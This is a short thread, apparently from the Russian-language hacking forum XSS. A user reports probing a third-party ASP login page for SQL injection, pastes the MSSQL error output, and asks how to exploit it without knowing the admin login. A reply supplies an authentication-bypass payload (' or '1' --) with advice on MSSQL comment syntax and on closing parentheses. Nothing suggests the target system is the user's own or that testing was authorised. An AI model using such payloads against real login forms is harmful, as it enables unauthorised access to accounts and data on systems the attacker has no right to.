• XSS.stack #1 – первый литературный журнал от юзеров форума

Скуль инъекция

aivus

(L3) cache
Пользователь
Регистрация
22.04.2006
Сообщения
169
Реакции
0
Вообщем есть сервер, на нем есть страничка ASP на которой стандартная форма login-pass

опробовал я ее на скуль

login: ' or '
pass: 123

ответ
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near '123'. /asp/members.asp, line 94




login: 123
pass: ' or '
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string 'or ') AND (approve = 1)'. /asp/members.asp, line 94




Вот........ только вот не пойму, что с этого можно поиметь, если учесть то, что каждый пользователь в системе имеет RANDOM логин, то есть логина админа я не знаю...
 
login: ' or '1' -- (насколько помню комментарий в MSSQL - -- если нет то исчи в мане как комментить )
pass: *
зы возможно понадобяться ещё )
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх